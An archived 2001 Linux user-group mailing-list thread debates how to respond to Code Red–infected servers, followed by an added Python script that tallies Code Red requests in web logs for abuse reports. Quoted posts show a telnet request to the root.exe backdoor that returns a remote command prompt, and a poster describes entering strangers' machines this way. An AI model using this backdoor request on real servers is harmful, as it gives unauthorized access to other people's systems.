CR worm infection attempts

Digital Wokan plug-discuss@lists.PLUG.phoenix.az.us
Thu, 09 Aug 2001 14:42:29 -0400


The only safe way to do this, and I'll continue this analogy for S&G's,
is to look up their address in the directory (assuming one searchable by
address) and give them a call.  If no one's home or they're unlisted, at
least you tried.

The real world version of what I just said:
They're running a web server, so typing the IP into a web browser to
bring up their site would be considered a normal use of their system. 
If they have a website up that hasn't been defaced yet, you can use the
contact information (which they've hopefully provided) to let them know.
Failing that, you can always try their upstream (like the chairman of
the Homeowners Association for sake of the comparison) to get in touch
with the homeowner/webmaster.  I did this for one site running a virtual
domain.  They didn't list contact info, so I contacted the www.xyz.com
webmaster who did have contact info.  That server has since been cleaned
up and is CR2 free.

George Toft wrote:
> 
> If you are walking down the street, and see a house with the door
> open, do you walk in to see if anyone is home?  When you return, and
> see the windows broken out, and the outside spray-painted, how do you
> feel?  I think this is a similar situation - if you walk in uninvited,
> it's called "illegal entry" and you may be arrested.  Likewise, testing
> a site to see if it has been exploited is illegal as you were accessing
> their computer in an unauthorized fashion.
> 
> Could you have stopped the crimes in both cases?  Maybe (if the owner
> listened to you).  Is it worth the risk to you, your reputation, and
> your family?  No.  I am not selfish - I am placing my family ahead of
> strangers, and they rely upon my income.  I suggest you do the same -
> just keep on walking, and make sure you have the safeguards of Fort
> Knox at home.
> 
> George
> 
> Derek Neighbors wrote:
> >
> > That is the problem.
> >
> > I looked at my logs out of curiosity.  I was AMAZED at the figures.  I
> > took the first IP and hit it and checked for the root.exe exploit.  Sure
> > enough it was WIDE open.
> >
> > Now I had a DILEMMA on my hands.  Do I notify this company or not?  I had
> > no malicious intent nor did I do anything.  The 'good' in me wanted to
> > notify them so that they were not 'toasted' by one with 'ill' intent.
> >
> > HOWEVER, I feared lawsuit, death and dismemberment.  So I said not a word.
> > I looked at their website about 4 hours later and they were defaced. :(
> >
> > What kind of a world is it?  I mean if I was walking down the street with
> > my fly open, I would hope to God someone would tell me.  However, I
> > suppose even in that case you should be careful.  I mean after all,
> > notifying someone that their fly was open means you were looking at
> > their crotch.  If you were looking at their crotch you must have been
> > wanting to rape them or harass them.
> >
> > Where does the silliness stop?
> >
> > -Derek
> >
> > On Wed, 8 Aug 2001, Kim Allen wrote:
> >
> > > I've been contacting the sites that my server logs show have been
> > > hitting me with the code red signature and so far no one has bothered to
> > > respond except for one. However that site has told me how secure they are
> > > and how there is no way that they have any problems. When I sent them the
> > > portions of my server logs showing they do have a problem they threatened
> > > legal action. Has anyone else had this type of response?
> > >
> > > > To answer your question... make sure you're hitting enter TWICE after
> > > > the command.
> > > >
> > > > As a security guy myself, I'm deeply troubled by what I'm finding.
> > > > Check it out:
> > > >
> > > > [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80
> > > > Trying xxx.xxx.xxx.xxx...
> > > > Connected to xxx.xxx.xxx.xxx.
> > > > Escape character is '^]'.
> > > > GET /scripts/root.exe HTTP/1.0
> > > >
> > > > HTTP/1.1 200 OK
> > > > Server: Microsoft-IIS/5.0
> > > > Date: Mon, 06 Aug 2001 04:22:13 GMT
> > > > Content-Type: application/octet-stream
> > > > Microsoft Windows 2000 [Version 5.00.2195]
> > > > (C) Copyright 1985-1999 Microsoft Corp.
> > > >
> > > > c:\inetpub\scripts>
> > > >
> > > > From here, I've been leaving a nice text file on \\ALL USERS\\ desktops
> > > > that explains how I did it, and why they need to pay attention to
> > > > security patches. :)
> > > >
> > > > Hopefully they won't take it the 'wrong' way.
> > > >
> > > > ~g~
> > > >
> > > > On 05 Aug 2001 15:15:02 -0700, Craig White wrote:
> > > > > Wayne Conrad wrote:
> > > > > >
> > > > > > On Sun, 05 August 2001, "J.Francois" wrote:
> > > > > > > I got tired of counting and just started putting the info into my IDS page.
> > > > > > > That way I can send complaints and point them to a URL so I don't have to
> > > > > > > keep recreating the same data each time.
> > > > > >
> > > > > > Are you putting the IPs up too?  Every one of the CRII infected boxes is rooted...  I wonder about the goodness of publishing a list of known rooted boxes.
> > > > > >     Wayne
> > > > > ________________________________________________
> > > > >
> > > > > I've been trying that out
> > > > >
> > > > > telnet ipaddress_from_my_httpd_access_log 80
> > > > >
> > > > > GET /scripts/root.exe HTTP/1.0
> > > > >
> > > > > but I can't get a command prompt - what am I missing?
> > > > >
> > > > > Craig
> > > > > ________________________________________________
> > > > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> > > > >
> > > > > PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> > > > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > > > >
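The log triage that Kim Allen and J.Francois describe above (pulling the source addresses that hit a server with the Code Red request signature and tabulating them for abuse complaints or an IDS page), written up as an added Python example that is not from any of the posts in this thread. The log lines are constructed Apache-style entries with RFC 5737 documentation addresses; the request patterns are Code Red's `/default.ida?NNNN...` buffer, Code Red II's `/default.ida?XXXX...` variant, and probes for the `/scripts/root.exe` backdoor shown in the telnet session.

```python
import re
from collections import defaultdict

# Apache common/combined log prefix: client IP, ident, user, [timestamp], "METHOD PATH PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample lines (not taken from the list posts); IPs are RFC 5737 documentation addresses.
SAMPLE_LOG = """\
192.0.2.10 - - [06/Aug/2001:04:22:13 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801 HTTP/1.0" 400 325
198.51.100.7 - - [06/Aug/2001:05:01:44 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801 HTTP/1.0" 400 325
198.51.100.7 - - [06/Aug/2001:05:01:45 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
203.0.113.4 - - [06/Aug/2001:05:10:02 -0700] "GET /index.html HTTP/1.0" 200 1532
"""

def classify(path):
    """Label a request path as a worm hit; returns None for ordinary traffic."""
    if path.lower().startswith("/default.ida?"):
        payload = path.split("?", 1)[1]
        if payload.startswith("NNNN"):
            return "code-red-v1/v2"          # original Code Red filler byte
        if payload.startswith("XXXX"):
            return "code-red-ii"             # Code Red II filler byte
        return "default.ida-probe"           # .ida overflow attempt with another filler
    if re.search(r"/root\.exe", path, re.IGNORECASE):
        return "root.exe-backdoor-probe"     # someone looking for the planted cmd.exe copy
    return None

def summarize(log_text):
    """Aggregate worm hits per source IP: count, kinds seen, first and last timestamp."""
    report = defaultdict(lambda: {"count": 0, "kinds": set(), "first": None, "last": None})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                         # skip lines that are not in the expected format
        ip, ts, _method, path, _status = m.groups()
        kind = classify(path)
        if kind is None:
            continue
        entry = report[ip]
        entry["count"] += 1
        entry["kinds"].add(kind)
        entry["first"] = entry["first"] or ts
        entry["last"] = ts
    return dict(report)

def complaint_lines(report):
    """One line per offending IP, ready to paste into an abuse report or a published IDS page."""
    return [f"{ip}: {e['count']} hit(s), {', '.join(sorted(e['kinds']))}, {e['first']} .. {e['last']}"
            for ip, e in sorted(report.items())]

if __name__ == "__main__":
    for line in complaint_lines(summarize(SAMPLE_LOG)):
        print(line)
```

Point `summarize` at a real access log and the ordinary traffic (the `203.0.113.4` line in the sample) drops out, leaving only the hosts that are themselves infected or hunting for the backdoor.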